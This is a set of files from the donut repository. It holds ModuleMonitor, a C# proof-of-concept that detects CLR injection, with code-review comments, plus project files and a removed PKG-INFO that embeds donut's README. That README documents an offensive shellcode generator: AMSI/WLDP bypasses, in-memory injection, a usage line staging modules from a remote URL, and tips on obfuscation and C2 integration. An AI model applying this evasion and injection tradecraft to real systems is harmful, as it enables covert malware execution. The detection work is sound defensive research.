109 trace.DefaultBase = (UInt64)((ManagementBaseObject)e)["DefaultBase"];
110
111 if (((ManagementBaseObject)e)["ImageBase"] != null)
112 trace.ImageBase = (UInt64)((ManagementBaseObject)e)["ImageBase"];
113
114 if (((ManagementBaseObject)e)["ImageChecksum"] != null)
115 trace.ImageChecksum = (UInt32)((ManagementBaseObject)e)["ImageChecksum"];
116
117 if (((ManagementBaseObject)e)["ImageSize"] != null)
118 trace.ImageSize = (UInt64)((ManagementBaseObject)e)["ImageSize"];
119
120 if (((ManagementBaseObject)e)["ProcessID"] != null)
121 trace.ProcessID = (UInt32)((ManagementBaseObject)e)["ProcessID"];
122
123 if (((ManagementBaseObject)e)["TimeDateSTamp"] != null)
124 trace.TimeDateSTamp = (UInt32)((ManagementBaseObject)e)["TimeDateSTamp"];
125
126 return trace;
127 }
128 else
129 return trace;
130 }
131
132 public static void CLRSentry()
133 {
134 //Sentries never sleep.
135 //UCMJ Article 113
136 /* Any sentinel or look-out who is found drunk or sleeping upon his post,
137 * or leaves it before he is regularly relieved, shall be punished,
138 * if the offense is committed in time of war, by death or such other punishment as a court-martial may direct,
139 * by if the offense is committed at any other time,
140 * by such punishment other than death as court-martial may direct.
141 */
142 while (true)
143 {
144 //Get the module load.
145 Win32_ModuleLoadTrace trace = GetNextModuleLoad();
146
147 //Split the
148 string[] parts = trace.FileName.Split('\\');
149
150 //Check whether it is a .NET Runtime DLL
151 if (parts[parts.Length - 1].Contains("msco"))
152 {
153 Process proc = Process.GetProcessById((int) trace.ProcessID);
154
155 //Check if the file is a .NET Assembly
156 if (!IsValidAssembly(proc.StartInfo.FileName))
157 {
158 //If it is not, then the CLR has been injected.
159 Console.WriteLine();
160
161 Console.WriteLine("[!] CLR Injection has been detected!");
162
163 //Display information from the event
164 Console.WriteLine("[>] Process {0} has loaded the CLR but is not a .NET Assembly:", trace.ProcessID);
165 Console.WriteLine("{0,15} Win32_ModuleLoadTrace:", "[!]");
166
167 DateTime time = new DateTime();
168 DateTime.TryParse(trace.TIME_CREATED.ToString(), out time);
169 time.ToLocalTime();
170
171 //TODO: Time is printing strangley
172 Console.WriteLine("{0,15} (Event) TIME_CREATED: {1}", "[+]", time.ToString());
173 //TODO: Convert to hex
174 Console.WriteLine("{0,15} (Process) ImageBase: {1}", "[+]", trace.ImageBase);
175 Console.WriteLine("{0,15} (Process) DefaultBase: {1}", "[+]", trace.DefaultBase);
176 Console.WriteLine("{0,15} (Module) FileName: {1}", "[+]", trace.FileName);
177 Console.WriteLine("{0,15} (Module) TimeStamp: {1}", "[+]", trace.TimeDateSTamp);
178 Console.WriteLine("{0,15} (Module) ImageSize: {1}", "[+]", trace.ImageSize);
179 Console.WriteLine("{0,15} (Module) ImageChecksum: {1}", "[+]", trace.ImageChecksum);
180
181 Console.WriteLine("{0,15} Additional Information:", "[>]");
182
183 Process process = SafeGetProcessByID(int.Parse(trace.ProcessID.ToString()));
184
185 if (process != null)
186 {
187
188 Console.WriteLine("{0,30} Process Name: {1}", "[+]", process.ProcessName);
189 Console.WriteLine("{0,30} Process User: {1}", "[+]", GetProcessUser(process));
190 }
191 }
192 }
193 }
194 }
195
196 /// <summary>
197 /// Check if the file is a .NET Assembly by cheating and using the Reflection API's PE Parser.
198 ///
199 /// https://stackoverflow.com/questions/36797939/how-to-test-whether-a-file-is-a-net-assembly-in-c-sharp
200 /// </summary>
201 /// <param name="path">The file to check</param>
202 /// <returns>True if a .NET Assembly, false if not. Hopefully.</returns>
203 public static bool IsValidAssembly(string path)
204 {
205 try
206 {
207 // Attempt to resolve the assembly
208 var assembly = System.Reflection.AssemblyName.GetAssemblyName(path);
209 // Nothing blew up, so it's an assembly
210 return true;
211 }
212 catch (Exception ex)
213 {
214 // Something went wrong, it is not an assembly (specifically a
215 // BadImageFormatException will be thrown if it could be found
216 // but it was NOT a valid assembly
217 return false;
218 }
219 }
220
221
222 /// <summary>
223 /// Monitor for module loads using the WMI Event Win32_ModuleLoadTrace. Optionally filter by module names.
224 /// </summary>
225 /// <param name="filters">A list of module names to filter for.</param>
226 public static void MonitorModuleLoads(List<string> filters)
227 {
228 Console.WriteLine("Monitoring Win32_ModuleLoadTrace...\n");
229
230 while (true)
231 {
232 Win32_ModuleLoadTrace trace = new Win32_ModuleLoadTrace();
233 Win32_ModuleLoadTrace tracecomp = new Win32_ModuleLoadTrace();
234
235 //Get the details of the next module load
236 trace = GetNextModuleLoad(filters);
237
238 //If the trace is not empty
239 if (!trace.Equals(tracecomp))
240 {
241 Console.WriteLine();
242
243 //Display information from the event
244 Console.WriteLine("[>] Process {0} has loaded a module:", trace.ProcessID);
245 Console.WriteLine("{0,15} Win32_ModuleLoadTrace:", "[!]");
246
247 DateTime time = new DateTime();
248 DateTime.TryParse(trace.TIME_CREATED.ToString(), out time);
249 time.ToLocalTime();
250
251 //TODO: Time is printing strangley
252 Console.WriteLine("{0,15} (Event) TIME_CREATED: {1}", "[+]", time.ToString());
253 //TODO: Convert to hex
254 Console.WriteLine("{0,15} (Process) ImageBase: {1}", "[+]", trace.ImageBase);
255 Console.WriteLine("{0,15} (Process) DefaultBase: {1}", "[+]", trace.DefaultBase);
256 Console.WriteLine("{0,15} (Module) FileName: {1}", "[+]", trace.FileName);
257 Console.WriteLine("{0,15} (Module) TimeStamp: {1}", "[+]", trace.TimeDateSTamp);
258 Console.WriteLine("{0,15} (Module) ImageSize: {1}", "[+]", trace.ImageSize);
259 Console.WriteLine("{0,15} (Module) ImageChecksum: {1}", "[+]", trace.ImageChecksum);
260
261 Console.WriteLine("{0,15} Additional Information:", "[>]");
262
263 Process process = SafeGetProcessByID(int.Parse(trace.ProcessID.ToString()));
264
265 if (process != null)
266 {
267
268 Console.WriteLine("{0,30} Process Name: {1}", "[+]", process.ProcessName);
269 Console.WriteLine("{0,30} Process User: {1}", "[+]", GetProcessUser(process));
270 }
271 }
272 }
273 }
274
275 [DllImport("advapi32.dll", SetLastError = true)]
276 private static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
277 [DllImport("kernel32.dll", SetLastError = true)]
278 [return: MarshalAs(UnmanagedType.Bool)]
279 private static extern bool CloseHandle(IntPtr hObject);
280
281 /// <summary>
282 /// Gets the owner of a process.
283 ///
284 /// https://stackoverflow.com/questions/777548/how-do-i-determine-the-owner-of-a-process-in-c
285 /// </summary>
286 /// <param name="process">The process to inspect.</param>
287 /// <returns>The name of the user, or null if it could not be read.</returns>
288 public static string GetProcessUser(Process process)
289 {
290 IntPtr processHandle = IntPtr.Zero;
291 try
292 {
293 OpenProcessToken(process.Handle, 8, out processHandle);
294 WindowsIdentity wi = new WindowsIdentity(processHandle);
295 return wi.Name;
296 }
297 catch (Exception ex)
298 {
299 return ex.Message;
300 }
301 finally
302 {
303 if (processHandle != IntPtr.Zero)
304 {
305 CloseHandle(processHandle);
306 }
307 }
308 }//end method
309
310
311 /// <summary>
312 /// Try to get the process by ID and return null if it no longer exists.
313 /// </summary>
314 /// <param name="id"></param>
315 /// <returns></returns>
316 private static Process SafeGetProcessByID(int id)
317 {
318 try
319 {
320 return Process.GetProcessById(id);
321
322 }
323 catch
324 {
325 return null;
326 }
327 }
328
329 private static void PrintUsage()
330 {
331 Console.WriteLine();
332 Console.WriteLine("| Module Monitor [v0.1]");
333 Console.WriteLine("| Copyright (c) 2019 TheWover");
334 Console.WriteLine();
335
336 Console.WriteLine("Usage: ModuleMonitor.exe [--clr-sentry]");
337 Console.WriteLine();
338
339 Console.WriteLine("{0,-5} {1,-20} {2}", "", "-h, --help", "Display this help menu.");
340 Console.WriteLine("{0,-5} {1,-20} {2}", "", "--clr-sentry", "Monitor for CLR injection.");
341 Console.WriteLine();
342
343 Console.WriteLine("Examples:");
344 Console.WriteLine();
345
346 Console.WriteLine("ModuleMonitor.exe");
347 Console.WriteLine("ModuleMonitor.exe --clr-monitor");
348 Console.WriteLine();
349 }
350 }//end class
351 }//end namespace
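Review bot: In `CLRSentry()` the managed-or-not check runs on `proc.StartInfo.FileName`, which describes how a process was launched through this `Process` object, not the image of a process obtained with `GetProcessById`. As far as I can tell that value is empty here, so `IsValidAssembly` would return false and every process that loads a `msco*` module would be reported as an injection. Check the image path instead, e.g. `IsValidAssembly(proc.MainModule.FileName)`, and treat a failure to read it as "unknown" rather than "not an assembly". The same loop calls `Process.GetProcessById` unguarded, so a process that exits between the event and the lookup ends the sentry with an exception; the existing `SafeGetProcessByID` could be used there with `if (proc == null) continue;`. `GetNextModuleLoad` also creates a new `ManagementEventWatcher` on every call and never disposes it, so module loads that occur between two calls are presumably missed.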
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("ModuleMonitor")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("ModuleMonitor")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("361c69f5-7885-4931-949a-b91eeab170e3")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
0 # ModuleMonitor
1
2 Has its own repo at: https://github.com/TheWover/ModuleMonitor
3
4 Uses WMI Event Win32_ModuleLoadTrace to monitor module loading. Provides filters, and detailed data. Has an option to monitor for CLR Injection attacks.
5
6 The CLR Sentry option follows some simple logic: If a process loads the CLR, but the program is not a .NET program, then the CLR has been injected into it.
7
8 While useful, there are both false positives and false negatives:
9
10 * False Postiive: There are (few) legitimate uses of the Unmanaged CLR Hosting API. If there weren't, then Microsoft wouldn't have made it. CLR Sentry will notice every unmanaged program that loads the CLR.
11 * False Negatives: This will NOT notice injection of .NET code into processes that already have the CLR loaded. So, no use of the Reflection API and not when donut is used to inject shellcode into managed processes.
12
13 Please Note: This is intended only as a Proof-of-Concept to demonstrate the anomalous behavior produced by CLR injection and how it may be detected. It should not be used in any way in a production environment. You perform the same logic with the ``` Image Load ``` event for Sysmon or ETW. They would be easier to scale and integrate with enterprise tooling.
14
15 ![Alt text](https://github.com/TheWover/donut/blob/master/ModuleMonitor/img/detected.png?raw=true "CLR Sentry detection")
16
17 # Usage
18
19 ```
20 | Module Monitor [v0.1]
21 | Copyright (c) 2019 TheWover
22
23 Usage: ModuleMonitor.exe [--clr-sentry]
24
25 ```
0 <?xml version="1.0" encoding="utf-8"?>
1 <configuration>
2 <startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2"/></startup></configuration>
0 <?xml version="1.0" encoding="utf-8"?>
1 <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
2 <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
3 <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
4 <security>
5 <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
6 <!-- UAC Manifest Options
7 If you want to change the Windows User Account Control level replace the
8 requestedExecutionLevel node with one of the following.
9
10 <requestedExecutionLevel level="asInvoker" uiAccess="false" />
11 <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
12 <requestedExecutionLevel level="highestAvailable" uiAccess="false" />
13
14 Specifying requestedExecutionLevel element will disable file and registry virtualization.
15 Remove this element if your application requires this virtualization for backwards
16 compatibility.
17 -->
18 <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
19 </requestedPrivileges>
20 </security>
21 </trustInfo>
22
23 <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
24 <application>
25 <!-- A list of the Windows versions that this application has been tested on
26 and is designed to work with. Uncomment the appropriate elements
27 and Windows will automatically select the most compatible environment. -->
28
29 <!-- Windows Vista -->
30 <!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
31
32 <!-- Windows 7 -->
33 <!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
34
35 <!-- Windows 8 -->
36 <!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
37
38 <!-- Windows 8.1 -->
39 <!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
40
41 <!-- Windows 10 -->
42 <!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
43
44 </application>
45 </compatibility>
46
47 <!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
48 DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
49 to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
50 also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
51 <!--
52 <application xmlns="urn:schemas-microsoft-com:asm.v3">
53 <windowsSettings>
54 <dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
55 </windowsSettings>
56 </application>
57 -->
58
59 <!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
60 <!--
61 <dependency>
62 <dependentAssembly>
63 <assemblyIdentity
64 type="win32"
65 name="Microsoft.Windows.Common-Controls"
66 version="6.0.0.0"
67 processorArchitecture="*"
68 publicKeyToken="6595b64144ccf1df"
69 language="*"
70 />
71 </dependentAssembly>
72 </dependency>
73 -->
74
75 </assembly>
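Review bot: The manifest forces elevation with `<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />` and nothing in the file says which operation needs it, so a later maintainer cannot tell whether the requirement is still justified. A one-line comment above that element naming the operation that fails when unelevated would document the choice, for example `<!-- requireAdministrator: needed for <operation that fails unelevated> -->`. The identity is also still the template default, `name="MyApplication.app"`; it should carry the real assembly name (presumably ModuleMonitor, judging by the neighbouring files, though the file header is not visible here).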
+0
-264
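--- a/PKG-INFO
+++ b/PKG-INFO
@@ -1,264 +0,0 @@
-Metadata-Version: 2.1
-Name: donut-shellcode
-Version: 0.9.2
-Summary: Donut Python C extension
-Home-page: https://github.com/TheWover/donut
-Author: TheWover, Odzhan, byt3bl33d3r
-License: UNKNOWN
-Description: # Using Donut
-
-![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
-
-Version: 0.9.2 *please submit issues and requests for v1.0 release*
-
-Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
-
-TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
-
-v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
-
-## Introduction
-
-Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
-
-It can be used in several ways.
-
-## As a Standalone Tool
-
-Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
-
-```
-
-usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
-
--MODULE OPTIONS-
-
--f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
--u <URL> HTTP server that will host the donut module.
-
--PIC/SHELLCODE OPTIONS-
-
--a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
--b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
--o <payload> Output file. Default is "payload.bin"
-
--DOTNET OPTIONS-
-
--c <namespace.class> Optional class name. (required for .NET DLL)
--m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
--p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
--r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
--d <name> AppDomain name to create for .NET. Randomly generated by default.
-
-examples:
-
-donut -f c2.dll
-donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
-donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
-
-```
-
-### Building Donut
-
-Tags have been provided for each release version of donut that contain the compiled executables.
-
-* v0.9.2, Bear Claw:
-* v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
-* v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
-* v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
-
-However, you may also clone and build the source yourself using the provided makefiles.
-
-## Building From Repository
-
-From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
-
-```
-git clone http://github.com/thewover/donut
-cd donut
-```
-
-## Linux
-
-Simply run make to generate an executable, static and dynamic libraries.
-
-```
-make
-make clean
-make debug
-```
-
-## Windows
-
-Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
-
-```
-nmake -f Makefile.msvc
-nmake clean -f Makefile.msvc
-nmake debug -f Makefile.msvc
-```
-
-## As a Library
-
-donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
-
-## As a Python Module
-
-Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
-
-```
-pip install .
-```
-
-Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
-
-```
-pip install donut-shellcode
-```
-
-## As a Template - Rebuilding the shellcode
-
-*payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
-
-### Microsoft Visual Studio
-
-**Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
-
-Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
-
-```
-nmake clean -f Makefile.msvc
-nmake -f Makefile.msvc
-```
-
-This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
-
-To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
-
-```
-nmake clean -f Makefile.msvc
-nmake x86 -f Makefile.msvc
-```
-
-This will save the shellcode as a C array to *payload_exe_x86.h*.
-
-### Mingw-w64
-
-Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
-
-```
-make clean -f Makefile.mingw
-make -f Makefile.mingw
-```
-
-Once you've recompiled for all architectures, you may rebuild donut.
-
-## Bypasses
-
-Donut includes a bypass system for AMSI and other security features. Currently we bypass:
-
-* AMSI in .NET v4.8
-* Device Guard policy preventing dynamicly generated code from executing
-
-You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
-
-Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
-
-Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
-
-Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
-
-If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
-
-Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
-
-### Additional features.
-
-These are left as exercises to the reader. I would personally recommend:
-
-* Add environmental keying
-* Make donut polymorphic by obfuscating *payload* every time shellcode is generated
-* Integrate donut as a module into your favorite RAT/C2 Framework
-
-## Disclaimers
-
-* No, we will not update donut to counter signatures or detections by any AV.
-* We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
-
-# How it works
-
-## Procedure for Assemblies
-
-Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
-
-The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
-
-Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
-
-For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
-
-Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
-
-## Procedure for ActiveScript/XSL
-
-The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
-
-## Procedure for PE Loading
-
-The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
-
-## Components
-
-Donut contains the following elements:
-
-* donut.c: The source code for the donut payload generator
-* donut.exe: The compiled payload generator as an EXE
-* donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
-* donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
-* setup.py: The setup file for installing Donut as a Pip Python3 module.
-* lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
-* lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
-* lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
-* payload/payload.c: Main file for the shellcode.
-* payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
-* payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
-* payload/inmem_xml.c: In-Memory loader for XSL/XML files.
-* payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
-* payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
-* payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
-* payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
-* payload/http_client.c: Downloads a module from remote staging server into memory.
-* payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
-* payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
-* payload/inject.exe: The compiled C shellcode injector
-* payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
-* payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
-* payload/runsc.exe: The compiled C shellcode runner
-* payload/exe2h/exe2h.c: Source code for exe2h
-* payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
-* encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
-* hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
-
-# Subprojects
-
-There are three companion projects provided with donut:
-
-* DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
-* DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
-* ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
-* ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
-
-# Project plan
-
-* ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
-* Create a C# version of the generator.
-* Create a donut.py generator that uses the same command-line parameters as donut.exe.
-* Add support for HTTP proxies.
-~~* Find ways to simplify the shellcode if possible.~~
-* Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
-* ~~Dynamic Calls to DLL functions.~~
-* Handle the ProcessExit event from AppDomain using unmanaged code.
-
-Platform: UNKNOWN
-Requires-Python: >=3.0
-Description-Content-Type: text/markdown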
0 <?xml version="1.0" encoding="utf-8"?>
1 <configuration>
2 <startup>
3
4 <supportedRuntime version="v2.0.50727"/></startup>
5 </configuration>
0 BSD 3-Clause License
1
2 Copyright (c) 2019, TheWover
3 All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 1. Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 3. Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
3 <PropertyGroup>
4 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
5 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
6 <ProjectGuid>{98CA74C7-A074-434D-9772-75896E73CEAA}</ProjectGuid>
7 <OutputType>Exe</OutputType>
8 <RootNamespace>ProcessManager</RootNamespace>
9 <AssemblyName>ProcessManager</AssemblyName>
10 <TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
11 <FileAlignment>512</FileAlignment>
12 <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
13 <Deterministic>true</Deterministic>
14 <TargetFrameworkProfile />
15 </PropertyGroup>
16 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 <PlatformTarget>AnyCPU</PlatformTarget>
18 <DebugSymbols>true</DebugSymbols>
19 <DebugType>full</DebugType>
20 <Optimize>false</Optimize>
21 <OutputPath>bin\Debug\</OutputPath>
22 <DefineConstants>DEBUG;TRACE</DefineConstants>
23 <ErrorReport>prompt</ErrorReport>
24 <WarningLevel>4</WarningLevel>
25 <Prefer32Bit>false</Prefer32Bit>
26 </PropertyGroup>
27 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
28 <PlatformTarget>AnyCPU</PlatformTarget>
29 <DebugType>pdbonly</DebugType>
30 <Optimize>true</Optimize>
31 <OutputPath>bin\Release\</OutputPath>
